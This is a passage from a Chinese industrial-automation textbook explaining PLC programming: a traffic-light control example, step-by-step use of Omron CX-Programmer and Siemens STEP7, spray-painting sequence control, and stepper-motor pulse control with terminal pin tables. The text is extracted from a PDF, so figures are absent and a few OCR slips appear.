X1=1。 在起保停 电路中, 用 M1和 X1的常开触点组成的串联电路, 作 为控制 M2线圈的起动电路 。步 M3变为活动步时, 步 M2应变为不活动步, 因此可以将后续步 M3的常闭触点与 M2的线圈串联, 作为起保停电路的停止电路 。 2.2.2 交通灯 PLC控制编程实例 随着社会经济和城市交通快速发展 ,城市规模不断扩大, 交通日益繁忙 ,红绿灯保障了 城市交通有序 、安全 、快速运行 。现在城市十字路口的红绿灯基本都是采用程序控制 ,其中 采用可编程控制器(PLC) 程序控制的, 在实际使用中占有很大的比例, 在工科院校的 PLC 课程及实验教学与 PLC公司编程软件中, 红绿灯程序控制都作为典型的编程范例 。 十字路 口交通信号红绿灯通常为三种控制形式: ①传统红绿灯, 即绿灯切换到红灯之前, 车辆由动 到静, 用黄灯缓冲过度; 红灯切换到绿灯时, 车辆由静止到运动没有缓冲过渡; ②在传统红 绿灯控制形式的基础上增加绿灯闪烁 (简称绿闪) 功能 , 即在绿灯时段行将结束的最后 3s 闪烁三次, 其目的是提示绿灯时段行将结束, 并保留黄灯缓冲过度; ③数显红绿灯, 即倒计 时数字显示红绿黄灯的时段 。 由于全过程有时间显示 ,不要绿闪, 但可以保留黄灯 。现在绝 大多数红绿灯的数字显示屏幕能够显示红绿两色 , 目前带有方向指示的数显红绿灯也在增 加 。如果按红绿灯是否带数显的功能来分, 红绿灯可分成非数显和数显两大类 。在这两大类 中均可附带人行横道红绿灯 。 图2-41是十字路口交通信号灯俯视平面示意 。 图 2-41 十字路口交通信号灯俯视平面示意 2.2.2.1 红绿灯 PLC控制程序编制 通过带绿闪转向的红绿灯编程方法的探讨 , 来研究非数显红绿灯 PLC控制编程的一般 方法 。PLC编程方法均以西门子 S7-200作为背景 PLC机 。可以用多种编程方法来实现 , 例 如基本逻辑接点法 、S/R指令法 、SCR顺序控制法 、环形分配器法(或鼓型控制器法), 以 及采用上述两种以上编程法组合的综合编程法 。基本逻辑接点法 , 即采用计时器/计数器结 合基本逻辑接点实现时序输出 。这种编程法编出的程序短小精悍 ,但要求编程者有较丰富的 编程经验; S/R指令法 ,应当说没有什么鲜明的特点 , 它既可以靠基本逻辑接点法 , 又可以 按照顺序控制法的思路来编程; SCR顺序控制法 , 由于利用了 SCR顺序指令 , 编程上手十 分容易 ,但梯形图程序的网络行很多 ,且调试较难; 环形分配器法 (或鼓型控制器法), 一 般是用 SHRB移位寄存器“ 做 ”一个环形分配器 (PLC本身有鼓型控制器编程更为方便), 再按时序图的时刻分别输出到红绿黄灯上即可 。此类编程法最适合编按时序图输出的程序 。 为了采取众编程法之所长 ,也可采用这两种编程法 。交通信号灯控制 PLC配置示意图2-42 所示 。 图 2-42 交通信号灯控制 PLC配置示意图 上述编程法均可按顺序功能图进行编程 。 其中 , 南北向交通灯的控制顺序功能如图 2-43所示 ,东西向交通灯顺序控制功能图如图 2-44所示 , 两个顺序功能图在时间上是同步的 。 图 2-43 南北向交通灯控制顺序功能图 2.2.2.2 红绿灯控制梯形图程序 交通信号灯系统正常工作时序图如图2-45所示 。实现主干道信号灯控制的梯形图如图 2-46所示 。可看出该程序是基本逻辑接点法和 S/R指令法的综合体 。从图2-43和图2-44 的顺序功能图可以看出 ,所有的红黄绿灯的变换都是有固定的时间 。所以在图 2-46梯形图 的第一和第二网络行 ,采用 T1和 T2两个计时器组成了一个脉宽 、 占空比 、频率/周期均可 调的“ 脉冲发生器”(该脉冲发生器可用在上述全部编程方法中), 用它分配前后 45s的时序 控制 。T3和 T4、T5和 T6也是相同的原理 , 只是缩短周期而已 。但是绿闪信号闪烁是取自 T9/T11的脉冲发生器 , 而是考虑到转向绿灯亮 10s+绿灯亮 30s+绿灯闪 3s+黄灯亮 2s= 45s, 配合完成绿闪的控制和黄灯的点亮 。 因此 ,不带绿闪的交通红绿灯的 PLC编程是十分容易做到的 。 图 2-44 东西向交通灯顺序控制功能图 图 2-45 交通信号灯系统正常工作时序图 图 2-46 实现主干道信号灯控制的梯形图( 一) 图 2-46 实现主干道信号灯控制的梯形图(二) 图 2-46 实现主干道信号灯控制的梯形图(三) 交通信号红绿灯 PLC控制的编程 , 总的来说不是特别困难 ,但编程方法繁多 , 编程的 随意性很强 ,有的方法编制的程序很长并难以理解 。通过特别对带转向和绿闪的红绿灯交通 控制程序的编制 ,并对数字显示类红绿灯编程方法和技巧进行了研究之后 , 在 PLC实验系 统进行了调试和运行 , 实验证明该程序运用了一些编程技巧 , 编出的程序短小精炼 、运行可靠 。 2.3 先进的 PLC编程应用软件 2.3.1 欧姆龙编程软件 CX-Programer是欧姆龙自动化的 PLC编程软件 , 该软件可进行梯形图或助记符变成 、 软件仿真 、在线下载上载程序 、程序在线调试和在线运行测试 。为工程师和系统设计人员提 供了很好的帮手 。软件功能和使用过程如下 。 2.3.1.1 软件启动和界面 (1) CX-Programmer软件启动 。 CX-Programmer启动界面如图2-47所示 。 打开新工程和设置设备型号 , 在 CX-Programmer中点击工具栏 【新建】 按钮 , 如图 2-48所示 。 用鼠标左键点击【设置】 按钮 ,显示【设备型号设置】 对话框 ,如图2-49所示 。 用鼠标左键点击 并选择 CPU型号 。点击【确定】 按钮确认所选 CPU型号 。 (2) 主窗口显示 。 主窗口显示如图2-50所示 。 主窗口各项目内容见表2-5。 图 2-47 CX-Programmer启动界面 图 2-48 工具栏【新建】 按钮 图 2-49 显示【设备型号设置】 对话框 图 2-50 主窗口显示界面 表 2-5 主 窗 口 各 项 内 容 (3) 程序段 。 段是用来创建/显示程序分割为每个功能的“ 段区域”。 它不仅提高了程序的可读性而且 提高重复使用包含相似控制的程序的效率 , 因为在程序树中复制和粘贴非常容易 。而且 , 程 序可以按段来上载并且让在线操作变得方便 。程序段处理界面如图2-51所示 。 图 2-51 程序段处理界面 从段的列表中进入每一个段(梯形图区)。 执行上一页的相同操作给插入的段命名 。 双 击想要查看的梯形图所对应的段 。根据段的列表中程序的全局映像 (控制流程), 可以进入 指定的段 。段的列表中程序的全局映像如图2-52所示 。 图 2-52 段的列表中程序的全局映像 2.3.1.2 软件创建程序 这里阐述简单的程序编写 。查看光标是否在梯形图窗口左上角之后, 启动程序 。 (1) 常开接点的输入 。 按【C】 键可以打开【新接点】 的对话框 。常开接点对话框如图2-53所示 。 图 2-53 常开接点对话框 显示时地址最高位的0是省略的。【 . 】(句点) 在通道号和位号之间显示 。 (2) 线圈的输入 。 按【O】 键来打开【新线圈】 对话框 。线圈输入对话框如图2-54所示 。 图 2-54 线圈输入对话框 (3) 常闭接点的输入 。 按“/” 键显示【新建常闭接点】 的对话框 。常闭接点的输入对话框如图2-55所示 。 图 2-55 常闭接点的输入对话框 (4) 上升沿微分接点的输入 。 微分接点的输入对话框如图2-56所示 。此输入方法仅对 CS/CJ和 CV系列 PLC有用 。 对于其他系列 PLC,使用 DIFU(13) 指令 。 图 2-56 微分接点的输入对话框 (5) 定时器指令的输入 。 定时器位和参数的输入如图2-57、 图2-58所示 。 (6) END指令的输入 。 在新工程创建后 ,END指令的段能自动产生 。无需自己输入 END指令 。 2.3.1.3 程序在线调试 (1) 程序错误检查(编译)。 程序传输前检查错误: 点击 ,错误和地址信息显示在输出窗口 。双击显示的错误 , 梯 形图的光标会自动移动到相应出错的位置 , 然后错误所在位置的条栏变成红色 , 改正错误 。 在程序检查时输出窗口会自动打开 ,按J键或 F4键可以把光标移到出错的位置 , 按 ESC键 可以关闭输出窗口 。 (2) 进入在线 。 CX-Programmer根据不同使用方法提供三种连接方式 。 图 2-57 定时器位的输入接点对话框 图 2-58 定时器的参数输入对话框 : 在线工作根据打开工程时指定的 PLC设备型号和方法来进入在线工作状态 。 : 自动在线按一个键可以自动识别所连接的 PLC并和 PLC处于在线状态 , 比如从 PLC上载所有的数据 。 : 通过仿真器在线按一个键可以利用 CX-Simulator进入在线工作状态 (需要 CX- Simulator软件)。 (3) 监视 。 监视接点和线圈的 on/off状态 。 如果程序有大量的数据 , 当监视这些数据时滚动屏幕 的速度可能变得很慢 。这种情况下 ,点击下面的图标立即取消监视 ,滚动屏幕到想要监视的 地址的位置 ,然后再次改到监视模式 。 : 切换 PLC的 on/off状态的监视 。监视状态动态如图2-59所示 。 (4) 强制为 on/off 。 通过 CX-Programmer来强制接点/线圈的 on/off 。 把光标移到所要强制 on/off的接点或线圈处 。 鼠标右击 → [强制] → [On] 使用相同 方法可以取消位/线圈的强制 on/off 。强制符号如图2-60所示 。 图 2-59 监视状态动态图 图 2-60 强制接点/线圈的 on/off符号 一旦位/线圈强制为 on/off ,强制的状态一直保持到取消或执行相反的步骤 。外部输入 点或程序的运行结果不能改变其状态 。而且 , 当 PLC处于运行模式时无法执行强制操作 。 2.3.2 西门子编程软件 SIMATIC S7-300/400是一种通用型的 PLC,在现代工业领域中应用比较广泛 。STEP7是 S7-300/400的编程语言 ,包含了自动化项目中从项目的启动 、实施到测试以及服务 , 每 一 阶段所需要的全部功能 。然而 ,许多初学者感到西门子 PLC技术门槛太高 , 为不能尽快掌 握而苦恼 。这里通过示例项目介绍 STEP7编程软件的使用 , 帮助初学者轻松愉快地掌握 STEP7结构化编程技术 。 下面通过编写一个具体的例子来说明编程软件 STEP7的使用 ——— 电动机正 、反转点动 自动控制 。 [例2-1] 电动机系统起动后,可以进行手动和自动两种模式的选择; 手动模式下 , 可 进行电动机的正 、反转点动; 自动模式下 ,按起动按钮 , 电动机从左端开始 ,正转右行至右 端 ,停5s后 , 自动返回; 至左端后 ,停 8s后 , 自动右行; 如此往返 , 直到按下停止按钮 。 系统停止时 ,手动和自动模式均停止 。 2.3.2.1 STEP7软件创建 PLC项目 为电动机正反转控制系统创建一个项目 ,取名“ My _ project”。 (1) 启动 SIMATIC管理器 。 在安装好了 STEP7的计算机中 , 双击 Windows桌面图标 , 或者通过 【开始菜单】 → 【SI2MATIC】→【SIMATIC Manager】, 启动管理器 。 SIMATICManager的运行界面如图 2-61所示 。 (2) 创建项目 。 选择菜单【File】 → 【New】, 或点击工具条中的图标 , 打开建立新项目的对话框 。 在 Name框中输入项目名“ My _ project”,【OK】 确认 。也可以在启动 SI2MATIC管理器时, 利用自动弹出的对话框“ STEP7Wizard:‘New Project ’” 帮助建立新项目 , 系统默认的新项目名称是“ S7_ Pro×”。 执行菜单命令【Option】 →【Customize】, 选择选项卡的“ Gen- eral ” 页显示了保存项目的设定路径 。 2.3.2.2 STEP7软件硬件组态 对 PLC机架上的硬件进行配置 ,设置各种硬件模块的参数 。 (1) 插入一个站 。 执行菜单命令 【Insert】 → 【Station】 → 【SIMATIC300Station】 或 【SIMATIC400 Station】, 可以在当前项目下插入一个新站 。 当插入一个新站时 , 系统自动分配一个站名, 如:“SIMATIC300(1)”, 以后可以修改站名 。 (2) 启动硬件组态编辑器 。 在 SIMATIC管理器下选择刚刚插入的硬件站 , 执行菜单命令 【Edit】 → 【Open Ob- j ect】, 打开了“ 硬件组态”(Hardware Config) 应用程序窗口 , 利用它可以从 “ 硬件目录 ” (Hardware Catalog) 窗口中 插 入 模 块 。 也 可 以 通 过 双 击 硬 件 对 象 图 标 启 动 硬 件 组 态 编 辑器 。 在硬件组态“ Hardware Config” 窗口 , 执行菜单命令 【View】 → 【Catalog】, 或点击 工具栏中的图标 , 打开“ 硬件目录”。 (3) 产生硬件设定组态并存盘 。 是指从“ 硬件目录 ” 中选择硬件机架 (RACK), 并将指定模块摆放在机架中希望的插 槽 。例如组态一个“ SIMATIC300(1)” 的站 , 步骤如下 。在 SIMAT2IC300目录下: .机架 。打开 RACK-300文件夹 ,双击或拖曳图标到硬件组态窗口左边空白处 。 .电源 。打开 PS-300文件夹 ,双击或拖曳图标到1号插槽 。 . CPU。打开 CPU-300文件夹下的 CPU315-2DP文件夹 , 双击或拖曳图标到 2号 插槽 。 . I/O模块 。打开 SM-300文件夹下的 DI-300文件夹 ,双击或拖曳图标到4号插槽; 打 开 DO-300文件夹 ,双击或拖曳图标到5号插槽 。 3号插槽为接口模块IM360/IM361保留 。 当IM360/IM361不用时 ,物理上不能空 , 而逻辑上要空 , 即实际机架 3号位置放 DI16× DC24V模块 ,4号位置放 DO8×Relay 模块 , 其余依次类推 , 而逻辑上 , DI16×DC24V模块仍是4号插槽 ,DO8×Relay 模块仍是5号插槽 。组态完毕 , 点击工具栏中的图标 ,保存 设置 。如果计算机已与 PLC连接上 ,也可通过上载硬件实际组态到 PC。方法如下: 在你创 建的项目下 ,执行菜单命令 【PLC】 → 【Upload Station】, 或在你新建的项目下 , 点击工 具栏的图标; 系统自动搜索 PLC,选择你要的 PLC后 → 【OK】。 用此法读出的实际组态是 不完全的 , 因为有几个模块的订货号丢失 , 需要在上载的实际组态中输入实际模块的订 货号 。 (4) I/O模块的字节地址 。 硬件组态完成后 ,可以在“ HW Config ” 窗口的机架区域看到各模块的字节地址 。 例 如 ,4号插槽的 DI16×DC24V模块的地址在列为“ Iaddress” 的位置显示“ 0•1”, 表示16 位数字量的输入地址为I0.0~I0.7和I1.0~I1.7; 5号插槽的 DO8×Relay 模块的地址在列 为“ Q address” 的位置显示“ 1”, 表示8位数字量的输出地址为 Q4.0~Q4.7。 (5) 建立 PC/PG与 PLC的通信 。 在管理器中执行菜单命令【Options】 → 【Settingthe PG/PC Interface】, 打开“ Setting the PG/PC Interface” 对话框 。在中间的选择框中 ,选择实际使用的硬件接口 , 点击按钮, 打开“ Install/Remove Interfaces” 对话框 , 安装所需的硬件接口的驱动程序 。 点击按钮, 可以设置计算机与 PLC通信的参数 。 (6) 下载硬件组态 。 下载硬件组态数据前 ,应将 CPU 的存储器复位 。复位存储器的操作如下: PLC通电后 将钥匙开关从 STOP位置扳到 MRES位置 , STOP LED亮 、灭两次后 , 放开钥匙开关 , 使 它回到 STOP位置; 然后再扳到 MRES位置 ,STOP LED以2Hz的频率至少闪烁3s, 此时 存储器正在复位 , 最后 STOP LED 一直亮 , 表示复位完毕 , 可以松 开 钥 匙 开 关 。 选 中 SIMATIC300(1)站点击 ,执行硬件组态的下载 。 (7) 插入 S7程序 。 在项目“ My _ project ”下 , 打开 SIMATIC300(1) 站 ,再打开 CPU315-2DP,将程 序名“ S7Program(1)” 修改成具有实际意义的名称“ 电动机的正反转控制”。 也可以通过 执行菜单命令【Insert】 →【Program】 → 【S7Program】, 在当前项目下插入一个新程序 。 当插入一个新程序时 , 系统自动给出一个程序名 ,如:“S7Program(1)”。 编完程序后 ,用 拖曳的方法把该程序的块文件夹中的所有块拷贝到与 CPU相连的程序“ 电动机的正反转控 制 ” 的块文件夹 。 2.3.2.3 STEP7软件测试接线 使用“ Monitor/Modify Variables” 工 具 , 可 以 检 查 连 接 到 数 字 量 输 入/输 出 模 块 的 接线 。 (1) 建立符号表 。 使用符号地址可使程序更容易阅读和理解 。全局符号在符号表中定义 ,可供程序中所有 的块使用 ,CPU自动为程序中的全局符号加双引号 , 在局部变量前自动加“ # ” 号 。 点击 SIMATIC管理器左边的“ 电动机的正反转控制 ” 图标 , 右边的工作区将出现 “ Symbols ” 图标 ,双击它后进入符号编辑窗口 。 按图 2-62所示 , 编辑 “ 电动机正反转控制 ” 的符号 表 ,I/O的地址要在硬件组态中列出 。 符号表编辑完成后 , 可通过菜单命令 【View】 → 【Sort…】, 对符号表排序 。可按符号(Symbol)、 地址 (Address)、 数据类型 (Data type)、注释(Comment) 的升序或降序排 。 图 2-62 “ 电动机正反转控制 ”符号表 (2) 建立变量表 。 在 SIMATIC管理器下 ,执行菜单命令 【PLC】 → 【Monitor/Modify Variables】, 打开 “ Variable table1”, 在变量表中输入I/O地址 , 如图 2-63所示 。地址的符号因在符号表中 已定义而自动生成 。 图 2-63 利用变量表测试接线 (3) 测试I/O接线 。 当变量表完成时 ,在变量表编辑窗口执行菜单命令 【PLC】 → 【Connect to】 → 【Di- rect CPU】 建立 PC与 PLC的直接连接 。测试输入接线: 用工具 激活监视 ,操作有关的输入并观察屏幕上的状态显示。“Status value” 栏变绿 , 表示对应的输入接线接通 。 如图 2-63所示 ,表示I1.0、I1. 1、I1.2、I1.3均已接通 ,输入接线正常 。 为了检查输出的接线, 在“ Modify value ” 列 , 为相 应 的 输 出 输 入 状 态 1(实 际 显 示 为 “ true”), 在 CPU 处 于STOP状态时 ,用工具 激活修改值; 使 CPU处于 RUN状态 , 用工具 激活监视 , 观察对应“ Statusvalue” 栏的状态是否变绿 ,输出模块的 LED是否点亮 。修改 Q4.1、Q4.2、Q4.4的值为1,激活后相应的“ Status value” 栏变绿 ,再观察输出模块上对应的 LED是否 点亮 。在接线测试中观察到错误 ,一般的原因是操作错误; 硬件组态错误 , 订货号不匹配; I/O模块错误或者没有可靠连接上 。 2.3.2.4 STEP7软件编辑程序 (1) 创建 FC1和 FC2。 进入 S7程序“ 电动机的正反转控制 ” 的 Blocks, 在右边工作区空白处点击鼠标右键, 执行命令【Insert New Object】 →【Function】, 定义 FC1后,【OK】, 即在 Blocks工作区 创建了程序 FC1,用同样的方法可以创建 FC2。双击打开 FC1, 即可编写程序 。 (2) 在 FC1中编写电动机的模式选择程序 。 I0.1上升沿使系统启动(Q4.1=ON); I0.2闭合使系统停止(Q4.1=OFF)。 通过开关 I0.3可以选择手动或自动模式 ,I0.3=0,选择手动模式(Q4.2=ON); I0.3=1,选择自动模 式(Q4.3=ON)。 选择操作模式后要用自动复位按钮I0.4应答 。改变模式或系统停止 。 以前 选择的模式必须取消 。梯形图如图2-64所示 。在梯形图上可以显示绝对地址及符号地址 ,路 径是在 LAD/STL/FBD窗口中,【Options】 →【Customize…】 →【View】,“√ ”记“ Symbol informat with text”。 也可以仅仅显示符号地址(见图 2-63和图 2-64), 方法是:“√ ” 记 “ Symblic representation”, 而“ Symbol informat with text” 不“ √ ”记 。 图 2-64 FC1电动机的模式选择程序梯形图 (3) 在 FC2中编写电动机控制程序 。 先编写点动控制程序 。点动控制只能在手动模式(Q412=ON) 时操作 。I0.5使电动机 正转右行; I0.6使电动机反转左行 。 用按钮实现电动机的互锁 。 程序见图 2-65中的 Net- work1和 Network2。 图 2-65 FC2电动机的点动和自动控制程序( 一) 图 2-65 FC2电动机的点动和自动控制程序(二) 随后编写自动控制程序 。 自动控制在自动模式(Q4.3=ON) 下操作 。I1.1启动电动机 正转右行 , 至右限位行程开关I1.2闭合时停; 延时 5s(用延时接通定时器 T12计时), 自 动左行 , 至左限位行程开关I1.3闭合时停; 延时 8s(用延时接通定时器 T13计时), 又自 动右行 。如此自动往返 , 直到按下停止按钮I1.0或自动模式取消 (Q4.3=OFF)。 自动控 制程序见图2-65中 Network3到 Network6。为了避免双线圈输出造成系统逻辑运算错误, 电动机分别用右行点动和自动位存储器 M11.1和 M11.3控制 , 最后合并到 Network7控制 电动机右行接触器 。 电动机左行接触器也同样处理 。 (4) 在 OB1中调用 FC1和 FC2并下载程序 。 双击打开 OB1的编程窗口 , 图标可以增加一个新的网络 。右边的元件窗口可以选择位逻辑指令 、程序控制指令 、定时器 、计数器 、数 据处理和运算指令 、功能和功能块等 。本例只需 要调用 FC1和 FC2,点开 FC blocks前面的“ + ” 号 ,显示 FC1和 FC2。 双击或拖曳图标 FC1到 Network1的 横 线 上 即 可 , 同 样 方 法 调 用 FC2, 最后得到的梯形图如图 2-66所示 。 保存 OB1 后 ,关闭 LAD/STL/FBD窗口 。选中所 有 的 程 序 以 及 系 统 数 据 包 (System data), 点击执行程序的下载 。 2.3.2.5 STEP7软件测试程序 程序中的逻辑错误往往需要通过对程序的跟踪调试查找 。 STEP7提供了对程序状态检 测和跟踪调试的功能 。在 PLC运行程序的过程中 ,通过 STEP7程序编辑器窗口 , 单击工具 栏按钮 , 即可进入监视状态 。对于不同语言编写的程序 ,其监视界面也不同 。在 LAD程序 中 ,监视界面下会显示信号流的状态和变量值 。如图2-67所示 , 处于有效状态的元件显示 为绿色实线 ,处于无效状态的元件显示为蓝色虚线 。在变量位置会显示该变量的当前值 , 也 可以在 STL程序中监视 CPU内部信息 。可显示的信息包括以下内容: 状态位 (STA)、 逻 辑操作结果(RLO)、 标准状态即累加器 1(STANDARD)、 地址寄存器 1(AR1)、 地址寄 存器2(AR2)、 累加器2(ACCU2)、 数据块寄存器1(DB1)、 数据块寄存器2(DB2)、 间 接寻址存储器(Indirect)、 状态字(StatusWord)。 图 2-67 LAD程序状态监视 上述信息显示在程序窗口右侧的监视窗口中 , 每条 STL语句都对应一条监视信息 , 以 显示每条语句执行后的状态 。用户可以通过在显示信息的标题栏上单击右键 , 由快捷菜单 【Hide】 和【Show】 选项可以对上面列出的信息是否显示作出选择 。 如果仅仅是调试程序, 也可将程序下载到 PLCSIM 中 。此时 , 可以不要硬件组态 。 下载前 , 单击 SIMATIC Man- ager窗口的工具图标 , 打开 PLCSIM ,设置 CPU为停止模式 。 STEP7采用的是较为抽象的结构化编程体系 , 只有理解了其原理 , 才能真正理解这种 结构化的编程方法 。这里的介绍只是“ 窥豹一斑”, 在 STEP7中安装了很多示例项目 , 这 些示例是帮助初学者学习 、深入领会和掌握整体系统结构的非常好的材料 。 可通过 SIMAT- ICManager ,单击菜单工具 , 在 【Sample projects 】 选项卡中选择 , 如选 【ZEn01 _ 01 _ STEP7_ STL _ 1—9】→【OK】 可以打开这个示例项目 。 PLC自动化技术与工控系统 3.1 PLC 控 制 技 术 3.1.1 PLC顺序逻辑控制 顺序逻辑控制是工业生产控制的主要控制形式 , 它对生产过程传感器的输入条件 , 通过 组合逻辑 ,产生输出控制开关信号实现产品制造的加工控制 ,例如控制电磁阀门 、 电动机起 动和电加热处理 。 由于 PLC对逻辑电路的梯形图是顺序扫描处理的 (类似程序指令按条执 行), 因此复杂顺序逻辑控制过程是对逻辑脉冲序列进行实时处理的完成的 。这是 PLC顺序 逻辑控制能够解决复杂自动化系统问题的理论基础 , 下面以生产包装喷涂 PLC应用为例, 介绍 PLC的顺序逻辑控制 。 喷漆涂装是目前电子产品最为广泛应用的技术 ,对塑料进行喷涂可使成型件有多重色彩 之感 ,更加合理化 , 能改善其耐候性 、耐褪色性及耐化学药品性 , 防止带电 ,也可对成型件 增添特殊色彩 ,从而赋予制品特性 ,增大其附加价值 。 目前 ,人们对环境保护的意识越来越 强 ,对日常生产生活所接触产品喷涂技术要求日益增强 。众所周知 ,油漆含有大量的有毒物 质 ,如果大量的排放到外界 ,将会对环境造成严重污染 。雾状油漆易燃易爆 ,需要严格控制 在一定的生产范围之内 。设计出一种合理又安全的喷漆自动控制系统是非常有必要的 , 它既 能减少了对外界的污染 , 又可节约大量的生产成本 ,最大程度地减少不安全因素 。 (1) 喷涂流量控制系统 。 流量系统采用闭环反馈方式控制喷枪流量 , 和开环系统相比 , 它使用流量的信号作为反 馈信号 ,将其与输入端的控制量相比较 , 根据误差产生的电信号 , 通过电流/压力转换器最 终控制喷枪的流量 。流量控制用于控制到喷枪的喷涂材料量 ,避免在喷涂结束阶段由颜料太 稠或太快产生的漂流 ,使喷涂更加均匀 。 流量控制模块包括流量计 、流量校准仪 、 电流/压 力转换器 、PrecisionMix控制器 。这些装置组成控制系统 ,一起来调节和维持到喷枪的喷涂 材料流量 ,如图3-1所示 。 (2) 生产过程 PLC控制 。 纸制品生产喷涂控制过程如图 3-2所示 , 生产线要完成对待包装纸制品的喷涂工作 。 PLC喷涂控制系统由光电传感器1、光电传感器2、喷枪和 PLC组成 。 PLC逻辑控制过程 : 光电传感器1检测纸制品是否到位 , 光电传感器2检测推杆是否 到位并由此计算传送速度 , 按照速度和光电传感器到喷枪的距离计算延迟时间 , 延迟时 间到喷枪喷涂并保持一段时间 。 整个生产过程按周期进行 , 其中传送带运行速度v是无级 别变化的 , 生产过程中有可能出现有个别纸制品缺少的情况 , 因此光电传感器仅检测纸制品 , 光电传感器 2仅检测推杆 。 传感器检 测控制时序图如图 3-3所示 。纸制品生产过程的喷枪喷涂部分控制程序如梯形图 3-4 所示 其中 0.00为传感器 1输入节点 ,闭合表 示 光 电 传 感 器 1检 测 到 纸 制 品 ; 0.01 为传感器 2输入节点 , 闭合表示光电传感器2检测到传送带推杆 。当传感器 1检测到纸制品 时 , 0.00闭 合 启 动 计 时 器 TIM010计时 ,计时器复位时间为 2000;计时结果减 2000, 结果乘传感器 1到喷枪的距离 , 结果为 送 DM102除以系数为喷枪延迟时间送高速计时器 。高速计时器 TIMH01延迟时间到控制 10.0节点闭合喷枪开始喷涂 ,计时器 TIMH02控制喷枪喷涂时间 ,整个工作过程周期重 复进行 。 图 3-3 传感器检测控制时序图 现场总线控制系统比较常规的 DCS系统更安全可靠 。 PLC喷涂现场总线控制系统采用 CAN现场总线流量计和阀岛 ,结合 PLC控制器使整个系统安全可靠 , 具有较高的实用性 。 该系统已在包装喷涂行业得到了成功的应用 。 图 3-4 喷枪喷涂控制程序时序图 3.1.2 PLC运动系统控制 PLC运动控制是机电系统常见的控制形式 。对于位置变量控制 , 常采用步进电动机伺 服控制方式 。对于速度变量控制 , 常采用变频交流调速控制方式 。在实际应用中 ,位置和速 度控制也经常一起应用 , 比如数控机床控制系统同时采用步进电动机刀具进给位置控制和工 件运动速度控制的应用 。 3.1.2.1 PLC步进电动机位置控制实例 (1) 步进电动机的 PLC控制原理 。 应用 PLC对步进电动机进行控制 , 主要作用是解除进给方向运动的限位 , 如解除 X 向 和Z 向的限位 。还可以对进给方向进行手动的快速移动 。 PLC对步进电机进行控制 , 主要是根据步进电机的控制原理 。 向步进电机驱动器发送 一个脉冲信号 , 电机驱动器驱动步进电机按设定的方向转动一个固定的角度(称为步距角), 它的旋转是以固定的角度一步一步运行的 。 PLC可以方便地设置脉冲量 ,PLC为西门子 S7-200系列 , 脉冲输出指令为 PLS。其具 体的设置为: 脉冲输出指令 (PLS) 检测为脉冲输出 (Q0.0或 Q0.1) 设置的特殊存储器 位 ,然后激活由特殊存储器位定义的脉冲操作 。 操作数: Q常数(0或1)。 数据类型: 字 。 脉冲输出范围: Q0.0~Q0.1。 每个 CPU有两个 PTO/PWM 发生器产生高速脉冲串和脉冲宽度可调的波形 。 一个发生器分配在数字输出00.0,另一个分配在数字输出00.1。 PTO/PWM 发生器和映像寄存器共同使用 00.0和 00.1。 当 Q0.0或 00.1设定为 PTO 或 PWM 功能时 ,PTO/PWM 发生器控制输出 , 在输出点禁止使用通用功能 。 映像寄存器 的状态 、输出强置或立即输出指令的执行都不影响输出波形 。 当不使用 PTO/PWM 发生 器时 , 输出由映像寄存器控制 。 映像寄存器决定输出波形的初始和结束状态 , 以高电平 或低电平 产 生 波 形 的 起 始 和 结 束 。 在 步 进 电 动 机 控 制 中 , 选 择 PWM 脉 冲 宽 度 可 调 的 波形 。 这种直接利用 PLC指令输出脉冲的方法 , 对脉冲宽度和脉冲量的设置比较方便 ,但不 足之处在于 , 它只能利用 Q0.0或 Q0.1作为脉冲输出点 , 当这两个输出点 , 被其他功能占 用后 ,其他输出点将不能进行脉冲量输出 。可以利用时间继电器直接编制一个脉冲程序 ,这样可以方便地从任何输出点输出脉冲 。 (2) 步进电机的 PLC控制程序 。利用 PLC内部提供的延时闭合时间继电器 T33和 T44, 编制了宽度可调的脉冲发生程序 ,程序如图3-5所示 。 当I1.1接通时 , PLC的输出点 Q2.4可产生一个脉冲量 , 脉冲的时序图如图 3-6所示 。 图 3-6 PLC产生脉冲时序图 控制步进电动机 , 除了一个脉冲量之外还需要一个控制旋转方向的量 。 步进电动机的PLC控制程序如图3-7所示 。 图 3-7 步进电动机的 PLC控制程序 图 3-8 按钮与 PLC的连线 (3) 步进电动机与 PLC控制连接 。 1) PLC与控制按钮的连线 。 步进电动机的 旋转 ,在硬数控面板上采用点动按钮来控制 。 当 按钮闭合时 ,对应的电动机以相应的旋转方向转 动 。按钮与 PLC的连线如图3-8所示 。 2) PLC与步进电动机驱动器的连接 。 根据 步进电动机驱动器的信号要求 , 通过 PLC的输 出数字量点 ,输出了步进电动机的所需信号 ,其 接线图如图3-9所示 。 (4) 运动控制器的接线 。 运动控制器对进给系统的控制主要通过专用 输入/输出接口及控制信号输出接口实现 。 专用输入包括驱动报警信号 、原点信号和限 位 信 号 , 通 过 端 子 板 的 CNS( CN6, CN7, CN8), CN12与驱动器及外部开关相连 。 专 用 输出包括: 驱动允许 , 驱动报警复位 。 专用输 出通过端子板 CNS, CN6, CN7, CN8与驱动 器连接 。 CNS对应 1轴 , CN6对应 2轴 , CN7 对应 3轴 , CN8对应 4轴 。 CNS~CN8的引脚 定义相同 , 见表 3-1, CN12的定义见表 3-2, 连接方法如图3-10所示 。 图 3-9 PLC与步进电动机驱动器的连接图 表 3-1 端子板 CN5(CN6,CN7,CN8) 定义 引脚 信号 说明 引脚 信号 说明 1 OGND 外部电源地 14 OVCC 外部电源 2 ALM 驱动报警 15 RESET 复位 3 ENABLE 驱动允许 16 保留 未使用 4 A— 编码器输入 17 A+ 编码器输入 5 B— 编码器输入 18 B+ 编码器输入 6 C— 编码器输入 19 C+ 编码器输入 7 +5V 电源输出 20 GND 数字地 8 DAC 模拟输出 21 GND 数字地 9 DIR+ 步进方向输出 22 DIR— 步进方向输出 10 GND 数字地 23 PULSE+ 步进脉冲输出 11 PULSE— 步进脉冲输出 24 GND 数字地 12 保留 保留 25 保留 未使用 13 GND 数字地 表 3-2 端子板 CN12的定义 引脚 信号 说明 引脚 信号 说明 1 HOME0 1轴原点输入 9 LIMIT2+ 3轴正向限位 2 HOME1 2轴原点输入 10 LIMT2— 3轴负向限位 3 HOME2 3轴原点输入 11 LIMIT3+ 4轴负向限位 4 HOME3 4轴原点输入 12 LIMIT3— 4轴负向限位 5 LIMIT0+ 1轴正向限位 13 EXI0 通用输入 6 LIMIT0— 1轴负向限位 14 EXI1 通用输入 7 LIMIT1+ 2轴正向限位 15 OGND 外部电源地 8 LIMIT1— 2轴负向限位 16 OVCC +12V/+24V输出 控制输出信号连接方法: SV卡可以输出两种信号 ——— 